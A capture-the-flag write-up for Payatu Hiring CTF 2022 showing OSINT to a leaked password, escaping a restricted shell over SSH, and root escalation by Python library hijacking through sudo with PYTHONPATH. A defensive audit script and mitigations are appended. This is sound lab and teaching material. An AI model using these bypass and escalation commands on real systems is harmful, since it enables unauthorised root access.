Payatu Hiring CTF 2022

P4ul Jeremi4h
Oct 15, 2022

Network 1,2 Writeup

Hello guys, today we are going to have a look at a cool Network x OSINT challenge from Payatu CTF 2022.

1. Mistake — 1

Category: Network

Points: 150

Mmm, Just an ordinary Site?

It seems interesting

All of the hyperlinks are empty except the GitLab one.

From the above image we know that the username is saddetail.

  1. Let's dig through all the commits.

  2. Of course, just another Base64!

Base64 recipe must be ROT (the Caesar hint)
take-a-few-pages-from-my-book (password)
  • So we can conclude that it is the password for something.

Back to the challenge description:

Note: When you find your way to the hotel, please note that Room № 22 is under repair, you can check in at Room № 9922 instead

Number 22 denotes SSH.

  • All we need is a host to SSH into on the custom port number 9922.


❯ host has address
( also used to do SSH)

Hurray! We are in.

But we are restricted with rbash.

Restricted shell: The restricted shell is a Unix shell that restricts some of the capabilities available to an interactive user session, or to a shell script, running within it.

[+] Bypassing the restriction

  • -t "bash --noprofile" can be used to bypass the restrictions
ssh saddetail@ -p 9922  -t "bash --noprofile"

[1] Reading the file even in the restricted mode

saddetail@6dbb2a245253:~$ echo "`<flag.txt`"
flag{w@tch_th0s3_3xtra_Co5mi3s}

[2] By bypassing rbash


2. Mistake - 2

  • So we need some privilege to read the flag.txt at /root
saddetail@6dbb2a245253:~$ ls
__pycache__ bin flag.txt

[+] Library hijacking using Python

saddetail@6dbb2a245253:/opt$ head  
import os
import requests
try:
    import dummy
except ImportError:
    print("Working Fine")
def add(x, y):
    return x + y
  • Here dummy is the custom library which can be created by us to exploit the
  1. create a file called and write the payload in it
saddetail@6dbb2a245253:~$ cat 
import os

  2. Let's set a PYTHONPATH to get root privileges:

saddetail@6dbb2a245253:~$ sudo PYTHONPATH=/home/saddetail/ /usr/bin/python3 /opt/
[I'M ROOT ! ]
root@6dbb2a245253:/home/saddetail# id
uid=0(root) gid=0(root) groups=0(root)


root@6dbb2a245253:/home/saddetail# cat flag.txt
flag{w@tch_th0s3_3xtra_Co5mi3s}
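
The same weakness from the defender's side, as an added example that is not part of the original writeup or the challenge: an audit that lists every import of a root-run script that would be loaded from, or could be supplied by, a directory a non-root user can write to. SCRIPT is a constructed stand-in for the file under /opt, and the temporary directory stands in for /home/saddetail.

```python
import ast, os, stat, sys, sysconfig, tempfile
from importlib.machinery import PathFinder

# Constructed stand-in for the root-run script shown above (not the real file).
SCRIPT = 'import os\ntry:\n    import dummy\nexcept ImportError:\n    print("Working Fine")\n'

def imported_modules(source):
    """Top-level module names imported anywhere in the script."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module and node.level == 0:
            names.add(node.module.split(".")[0])
    return names

def untrusted_dir(path):
    """True if an account other than root can write into this directory."""
    st = os.stat(path or ".")
    return st.st_uid != 0 or bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit(source, search_path):
    """Map each risky import to the reason it is risky."""
    findings = {}
    for name in sorted(imported_modules(source)):
        if name in sys.builtin_module_names:
            continue  # compiled into the interpreter, never loaded from disk
        for entry in search_path:
            # find_spec only locates the module; it never executes it
            if PathFinder.find_spec(name, [entry]) is not None:
                if untrusted_dir(entry):
                    findings[name] = "loaded from non-root-writable dir " + entry
                break
        else:
            findings[name] = "not found; whoever controls the search path can supply it"
    return findings

def demo():
    """Audit SCRIPT with and without a user-controlled PYTHONPATH entry."""
    stdlib = sysconfig.get_paths()["stdlib"]
    with tempfile.TemporaryDirectory() as home:  # plays the role of /home/saddetail
        os.chmod(home, 0o777)
        open(os.path.join(home, "dummy.py"), "w").close()
        return audit(SCRIPT, [home, stdlib]), audit(SCRIPT, [stdlib])

if __name__ == "__main__":
    for label, result in zip(("PYTHONPATH kept", "PYTHONPATH dropped"), demo()):
        print(label, result)
```

sudo only passes PYTHONPATH through when the matching sudoers rule allows it (the SETENV tag or an env_keep entry), so removing that allowance closes the path used here. Running the script with python3 -I (isolated mode) also makes the interpreter ignore PYTHONPATH.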

Nice Challenge From Payatu Team ❤

Thanks For Reading ❤